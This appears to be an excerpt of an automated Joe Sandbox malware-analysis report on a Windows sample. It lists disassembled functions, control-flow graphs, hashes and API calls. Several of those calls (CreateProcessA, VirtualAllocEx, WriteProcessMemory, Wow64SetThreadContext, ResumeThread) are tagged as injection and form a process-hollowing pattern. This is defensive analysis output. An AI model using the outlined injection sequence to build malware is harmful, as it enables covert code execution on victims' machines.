                                                • Instruction ID: 5b0e64c4fca14b2e3e9e02841e07e10b7f095ab9482e518dc7061a7c86c2997a
                                                • Opcode Fuzzy Hash: cdd51c0839c76eada510a99168c56b34c3459418b85ca9d1be1e27edfa67d3fc
                                                • Instruction Fuzzy Hash: 90A15CB1D0061ADFEB21DF69C8417DDBBB6BF48310F18856AD808A7380DB749986CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F7A0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2555 714f7a0-714f835 2557 714f837-714f841 2555->2557 2558 714f86e-714f88e 2555->2558 2557->2558 2559 714f843-714f845 2557->2559 2565 714f8c7-714f8f6 2558->2565 2566 714f890-714f89a 2558->2566 2561 714f847-714f851 2559->2561 2562 714f868-714f86b 2559->2562 2563 714f855-714f864 2561->2563 2564 714f853 2561->2564 2562->2558 2563->2563 2567 714f866 2563->2567 2564->2563 2572 714f92f-714f9e9 CreateProcessA 2565->2572 2573 714f8f8-714f902 2565->2573 2566->2565 2568 714f89c-714f89e 2566->2568 2567->2562 2570 714f8a0-714f8aa 2568->2570 2571 714f8c1-714f8c4 2568->2571 2574 714f8ac 2570->2574 2575 714f8ae-714f8bd 2570->2575 2571->2565 2586 714f9f2-714fa78 2572->2586 2587 714f9eb-714f9f1 2572->2587 2573->2572 2576 714f904-714f906 2573->2576 2574->2575 2575->2575 2577 714f8bf 2575->2577 2578 714f908-714f912 2576->2578 2579 714f929-714f92c 2576->2579 2577->2571 2581 714f914 2578->2581 2582 714f916-714f925 2578->2582 2579->2572 2581->2582 2582->2582 2583 714f927 2582->2583 2583->2579 2597 714fa88-714fa8c 2586->2597 2598 714fa7a-714fa7e 2586->2598 2587->2586 2600 714fa9c-714faa0 2597->2600 2601 714fa8e-714fa92 2597->2601 2598->2597 2599 714fa80 2598->2599 2599->2597 2603 714fab0-714fab4 2600->2603 2604 714faa2-714faa6 2600->2604 2601->2600 2602 714fa94 2601->2602 2602->2600 2606 714fac6-714facd 2603->2606 2607 714fab6-714fabc 2603->2607 2604->2603 2605 714faa8-714faab 2604->2605 2605->2603 2608 714fae4 2606->2608 2609 714facf-714fade 2606->2609 2607->2606 2612 714fae5 2608->2612 2609->2608 2612->2612
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0714F9D6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e9c52ba617b414c0a0ae33c35f32bc20b0a7ce6f14ba7e9d6128c17503bf90a5
                                                • Instruction ID: a8aa84ce8a9705af38696ddffbf48c6bc29b16a23a7144ebb46e15b60be3ccee
                                                • Opcode Fuzzy Hash: e9c52ba617b414c0a0ae33c35f32bc20b0a7ce6f14ba7e9d6128c17503bf90a5
                                                • Instruction Fuzzy Hash: 51914CB1D0061ADFEB21DF69C8417DDBBB6BF48314F18856AD808A7380DB749986CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DACE8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2613 29dace8-29dacf7 2614 29dacf9-29dad06 call 29d9314 2613->2614 2615 29dad23-29dad27 2613->2615 2621 29dad1c 2614->2621 2622 29dad08 2614->2622 2617 29dad29-29dad33 2615->2617 2618 29dad3b-29dad7c 2615->2618 2617->2618 2624 29dad7e-29dad86 2618->2624 2625 29dad89-29dad97 2618->2625 2621->2615 2668 29dad0e call 29daf71 2622->2668 2669 29dad0e call 29daf80 2622->2669 2624->2625 2626 29dad99-29dad9e 2625->2626 2627 29dadbb-29dadbd 2625->2627 2630 29dada9 2626->2630 2631 29dada0-29dada7 call 29da050 2626->2631 2629 29dadc0-29dadc7 2627->2629 2628 29dad14-29dad16 2628->2621 2632 29dae58-29daf18 2628->2632 2634 29dadc9-29dadd1 2629->2634 2635 29dadd4-29daddb 2629->2635 2636 29dadab-29dadb9 2630->2636 2631->2636 2663 29daf1a-29daf1d 2632->2663 2664 29daf20-29daf4b GetModuleHandleW 2632->2664 2634->2635 2639 29daddd-29dade5 2635->2639 2640 29dade8-29dadf1 call 29da060 2635->2640 2636->2629 2639->2640 2644 29dadfe-29dae03 2640->2644 2645 29dadf3-29dadfb 2640->2645 2646 29dae05-29dae0c 2644->2646 2647 29dae21-29dae25 2644->2647 2645->2644 2646->2647 2649 29dae0e-29dae1e call 29da070 call 29da080 2646->2649 2651 29dae2b-29dae2e 2647->2651 2649->2647 2654 29dae51-29dae57 2651->2654 2655 29dae30-29dae4e 2651->2655 2655->2654 2663->2664 2665 29daf4d-29daf53 2664->2665 2666 29daf54-29daf68 2664->2666 2665->2666 2668->2628 2669->2628
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 029DAF3E
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9e6251db0d1df946b999e8b8c0b9e3fdef98c3b13e9d4ebb9c060486abede7a7
                                                • Instruction ID: 39a6d17e2cc42000c082c697fc6aa18b8e13c65980eeec38a93cc68f2bf45263
                                                • Opcode Fuzzy Hash: 9e6251db0d1df946b999e8b8c0b9e3fdef98c3b13e9d4ebb9c060486abede7a7
                                                • Instruction Fuzzy Hash: 97714570A00B058FEB28DF29D44475ABBF5FF88204F008A2DD48ADBA50DB75E955CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 051018E5 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2670 51018e5-5101956 2671 5101961-5101968 2670->2671 2672 5101958-510195e 2670->2672 2673 5101973-5101a12 CreateWindowExW 2671->2673 2674 510196a-5101970 2671->2674 2672->2671 2676 5101a14-5101a1a 2673->2676 2677 5101a1b-5101a53 2673->2677 2674->2673 2676->2677 2681 5101a60 2677->2681 2682 5101a55-5101a58 2677->2682 2683 5101a61 2681->2683 2682->2681 2683->2683
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05101A02
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1428014109.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_5100000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 928b723c0597705d3f58b27c9e59479c6d012468a8210875e238ce5c3ac291ff
                                                • Instruction ID: 22bd51f758b700ef724d38e823e89b5ce9ed8dafd407317f5c66de6ad2f6acf7
                                                • Opcode Fuzzy Hash: 928b723c0597705d3f58b27c9e59479c6d012468a8210875e238ce5c3ac291ff
                                                • Instruction Fuzzy Hash: D451C1B1D00358EFDB14CF99C984ADEBBB5FF48310F24852AE819AB250D7B49945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 051018F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2684 51018f0-5101956 2685 5101961-5101968 2684->2685 2686 5101958-510195e 2684->2686 2687 5101973-5101a12 CreateWindowExW 2685->2687 2688 510196a-5101970 2685->2688 2686->2685 2690 5101a14-5101a1a 2687->2690 2691 5101a1b-5101a53 2687->2691 2688->2687 2690->2691 2695 5101a60 2691->2695 2696 5101a55-5101a58 2691->2696 2697 5101a61 2695->2697 2696->2695 2697->2697
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05101A02
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1428014109.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_5100000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f7394e917a91584d0fef591d3fc54b393a3cde8e5c1390322a099a81dd8c2df0
                                                • Instruction ID: e993e09e85c7610876315c28d93bb53d0c3fc46c7430c6c58b168ddaa6755bfe
                                                • Opcode Fuzzy Hash: f7394e917a91584d0fef591d3fc54b393a3cde8e5c1390322a099a81dd8c2df0
                                                • Instruction Fuzzy Hash: 5041C1B1D00358EFDB14CF99C984ADEBBB5FF88310F24852AE819AB250D7B49945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029D44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2698 29d44e0-29d59b9 CreateActCtxA 2701 29d59bb-29d59c1 2698->2701 2702 29d59c2-29d5a1c 2698->2702 2701->2702 2709 29d5a1e-29d5a21 2702->2709 2710 29d5a2b-29d5a2f 2702->2710 2709->2710 2711 29d5a31-29d5a3d 2710->2711 2712 29d5a40 2710->2712 2711->2712 2713 29d5a41 2712->2713 2713->2713
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 029D59A9
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 57b229598f9e2126805b717b79080cd0a000b427ec1a3cbaff3bae67026f6b6b
                                                • Instruction ID: 7d1188b61fe226b9c5b7eba629051ba1898c27792e53bd5df386cfe75d0bce91
                                                • Opcode Fuzzy Hash: 57b229598f9e2126805b717b79080cd0a000b427ec1a3cbaff3bae67026f6b6b
                                                • Instruction Fuzzy Hash: 5541C370C0071DCFEB24DFA9C884B9EBBB5BF48304F60805AD409AB251DB75694ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029D58EC Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2715 29d58ec-29d59b9 CreateActCtxA 2717 29d59bb-29d59c1 2715->2717 2718 29d59c2-29d5a1c 2715->2718 2717->2718 2725 29d5a1e-29d5a21 2718->2725 2726 29d5a2b-29d5a2f 2718->2726 2725->2726 2727 29d5a31-29d5a3d 2726->2727 2728 29d5a40 2726->2728 2727->2728 2729 29d5a41 2728->2729 2729->2729
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 029D59A9
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ae41faa3a1c2f4c0b43e8205f5b8881a209daadbcbc4f4abe3643eac019f10ef
                                                • Instruction ID: 2ce58122336a99e4181cdb26901beb3991dc9deb6c366755fb5148e3f0aa81dd
                                                • Opcode Fuzzy Hash: ae41faa3a1c2f4c0b43e8205f5b8881a209daadbcbc4f4abe3643eac019f10ef
                                                • Instruction Fuzzy Hash: F641D1B0C00719CBEB24CFA9C984B9EBBB5BF48304F60805AD409AB255D775694ACF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05104050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2731 5104050-510408c 2732 5104092-5104097 2731->2732 2733 510413c-510415c 2731->2733 2734 5104099-51040d0 2732->2734 2735 51040ea-5104122 CallWindowProcW 2732->2735 2740 510415f-510416c 2733->2740 2741 51040d2-51040d8 2734->2741 2742 51040d9-51040e8 2734->2742 2736 5104124-510412a 2735->2736 2737 510412b-510413a 2735->2737 2736->2737 2737->2740 2741->2742 2742->2740
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05104111
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1428014109.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_5100000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 4b6d67c49dfd940f817da6b3cf7d7d0949529d1fa52f1db36f5ae051bdf9cc95
                                                • Instruction ID: c812f2e491f89c933a18a7139908175418ecf424eac4bba8dd1acfa02bf79513
                                                • Opcode Fuzzy Hash: 4b6d67c49dfd940f817da6b3cf7d7d0949529d1fa52f1db36f5ae051bdf9cc95
                                                • Instruction Fuzzy Hash: DC41F9B5900305CFDB14CF95C889AAABBF6FB88314F24C459D519AB361D7B5A841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F110 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2745 714f110-714f166 2749 714f176-714f1b5 WriteProcessMemory 2745->2749 2750 714f168-714f174 2745->2750 2752 714f1b7-714f1bd 2749->2752 2753 714f1be-714f1ee 2749->2753 2750->2749 2752->2753
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0714F1A8
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: ddc23ac07d12b79197d3fd414b1cc4b2d23aa605bbf95e6c64faffa020f55be2
                                                • Instruction ID: 75f881052f5a0551d50ffd80ba48e7aa6e96fc52ff1f3e62e7d43b048bcf6f34
                                                • Opcode Fuzzy Hash: ddc23ac07d12b79197d3fd414b1cc4b2d23aa605bbf95e6c64faffa020f55be2
                                                • Instruction Fuzzy Hash: 472139B1D003499FDB10CFAAC9847DEBBF5FF48320F14852AE958A7280D7799945CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F200 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2767 714f200-714f295 ReadProcessMemory 2771 714f297-714f29d 2767->2771 2772 714f29e-714f2ce 2767->2772 2771->2772
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0714F288
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 2c969d4dc7f6ac25816aa978c69cafa71c5e28c5a55ddabc413b8e78a00c2aaa
                                                • Instruction ID: 38a3d02c96616a38faea649ad550858ade22e55908b969185e25e637d8c5db7f
                                                • Opcode Fuzzy Hash: 2c969d4dc7f6ac25816aa978c69cafa71c5e28c5a55ddabc413b8e78a00c2aaa
                                                • Instruction Fuzzy Hash: 292128B1D003499FDB10DFAAC844ADEBBF5FF48310F14842AE558A7240D7789541CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F118 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2757 714f118-714f166 2759 714f176-714f1b5 WriteProcessMemory 2757->2759 2760 714f168-714f174 2757->2760 2762 714f1b7-714f1bd 2759->2762 2763 714f1be-714f1ee 2759->2763 2760->2759 2762->2763
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0714F1A8
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 19a21ccb86f238cc550f0c3055bfb67747be183a52dde7755d01a74faab8328e
                                                • Instruction ID: 9fc622c28a75c994b88e6315ba85a35e60f255a523db740d1e7d36f70dd4035d
                                                • Opcode Fuzzy Hash: 19a21ccb86f238cc550f0c3055bfb67747be183a52dde7755d01a74faab8328e
                                                • Instruction Fuzzy Hash: 462124B19003599FDB10CFAAC985BDEBBF5FF48310F14882AE918A7340D7789945CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714EF78 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2776 714ef78-714efcb 2779 714efcd-714efd9 2776->2779 2780 714efdb-714efde 2776->2780 2779->2780 2781 714efe5-714f00b Wow64SetThreadContext 2780->2781 2782 714f014-714f044 2781->2782 2783 714f00d-714f013 2781->2783 2783->2782
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0714EFFE
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: e0d109067d1aae382e16dbec31f61f484d21b00767f55c691e08bb6a1fd9b1c5
                                                • Instruction ID: 076532ad641774e7e2ea75c928d58185e64ac0cca5e34891035fdd4f71e102b8
                                                • Opcode Fuzzy Hash: e0d109067d1aae382e16dbec31f61f484d21b00767f55c691e08bb6a1fd9b1c5
                                                • Instruction Fuzzy Hash: 4B2159B1D003098FDB20CFAAC4857EEBBF5EF48214F14842AD459A7340CB799946CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DB6D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,029DD586,?,?,?,?,?), ref: 029DD647
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f7ed053fdf456be80a3e100b6c891a8ae1d2725cc515c8dc166beb2cf7618446
                                                • Instruction ID: ea8bd7bb4953f3fd4493ba3077ddd0ae0dfd01a64e4ab32e9408b945ab42ef07
                                                • Opcode Fuzzy Hash: f7ed053fdf456be80a3e100b6c891a8ae1d2725cc515c8dc166beb2cf7618446
                                                • Instruction Fuzzy Hash: 9B21E4B59003489FDB10CF9AD584ADEBBF8EB48310F14841AE918A7350D378A941CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F208 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0714F288
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 4de7fd69415342b21d8a954a3cf4a79d7cf5e38804dccae2007529801ae5f344
                                                • Instruction ID: e2ea7078a7ae76c4016abfe2d44b972bf7292500dc3b056bcfb5648c2770533b
                                                • Opcode Fuzzy Hash: 4de7fd69415342b21d8a954a3cf4a79d7cf5e38804dccae2007529801ae5f344
                                                • Instruction Fuzzy Hash: BA2116B1D003599FDB10CFAAC884BDEBBF5FF48310F148429E918A7240D7789941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714EF80 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0714EFFE
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 04bd8d1c7895176cf35803759123b315c851525c3195ba8fd3fd6140a86bcb9d
                                                • Instruction ID: fe2f0417f3fee7f1b33ab017ef1ebea239540bf7d857639fa7f2453aba2c4903
                                                • Opcode Fuzzy Hash: 04bd8d1c7895176cf35803759123b315c851525c3195ba8fd3fd6140a86bcb9d
                                                • Instruction Fuzzy Hash: 682138B1D003098FDB20CFAAC4857EEBBF5EF88224F148429D419A7340DB789946CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DD5B9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,029DD586,?,?,?,?,?), ref: 029DD647
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 0b133f207c6c2e40db13ffc0720686fca5cf11c2ab871c89853d712686fdfe3d
                                                • Instruction ID: fff46cacf44ecffdebc26fc2cd73606031fc832e80550b34ba0172339d54974b
                                                • Opcode Fuzzy Hash: 0b133f207c6c2e40db13ffc0720686fca5cf11c2ab871c89853d712686fdfe3d
                                                • Instruction Fuzzy Hash: 5121F3B5D003489FDB10CFAAD584ADEBBF5FB48310F14841AE918A7350D378A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F052 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0714F0C6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: e35646b7bf27a3f0ed4a2167473775be07313526fe0b982ab456df2fe62177b8
                                                • Instruction ID: a31f19d97edee645cba0b5455fa8c2919fdd5dd7520cf926044129ad1f680813
                                                • Opcode Fuzzy Hash: e35646b7bf27a3f0ed4a2167473775be07313526fe0b982ab456df2fe62177b8
                                                • Instruction Fuzzy Hash: C61129719003499FDB20DFAAC845BDEBFF5EF88320F14881AE555A7250C779A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DA0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029DAFB9,00000800,00000000,00000000), ref: 029DB1CA
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 0732a84a1271a42dc48d236dccd559aefa8f13aaa41bef82283b8376a8058f2f
                                                • Instruction ID: f11d8f0f5ee748eb31ded4057e659523d43a5768b8ebf0562b0a444a935f10f2
                                                • Opcode Fuzzy Hash: 0732a84a1271a42dc48d236dccd559aefa8f13aaa41bef82283b8376a8058f2f
                                                • Instruction Fuzzy Hash: 7E1106B59003098FDB10CF9AC444BDEFBF4EB88214F10841AE519A7200C775A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714F058 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0714F0C6
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 3dd1052a6b3538b56840cb2764fa9ea859ca6b78338445465a3d0536cbe8dfc9
                                                • Instruction ID: 9f7c529c000074ca07b14247d63727e82f165f3bb59f85f55e5b2846bb940921
                                                • Opcode Fuzzy Hash: 3dd1052a6b3538b56840cb2764fa9ea859ca6b78338445465a3d0536cbe8dfc9
                                                • Instruction Fuzzy Hash: 481137719003499FDB20DFAAC844BDEBBF5EF88320F148819E519A7250CB79A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0714EA92 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1429591220.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7140000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3a49ceee8407b1b173c58cb323b8a79d498c4a53c7b1ac773efc8ead94a85f9b
                                                • Instruction ID: fb8e94cdaef0914010384eb39649542067b4556896327d6336d2c2692da53878
                                                • Opcode Fuzzy Hash: 3a49ceee8407b1b173c58cb323b8a79d498c4a53c7b1ac773efc8ead94a85f9b
                                                • Instruction Fuzzy Hash: C31128B1D003588FDB20DFAAC4457DEFBF5EF88224F24885AD459A7240CB79A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 029DB159 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029DAFB9,00000800,00000000,00000000), ref: 029DB1CA
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1415203340.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_29d0000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: ecb1294375983d9fa0cbbfc8d5144c798815a9836cfd7a2fdaf398f541b834e2
                                                • Instruction ID: 2f57f9f63aaecdb8a38c2ebea06f4635d9a40aec3782f80e4c1aac8bfef0137f
                                                • Opcode Fuzzy Hash: ecb1294375983d9fa0cbbfc8d5144c798815a9836cfd7a2fdaf398f541b834e2
                                                • Instruction Fuzzy Hash: 3411E2B6D003098FDB20CF9AC945BDEFBF4EB88314F15842AD419A7200C779A546CFA5
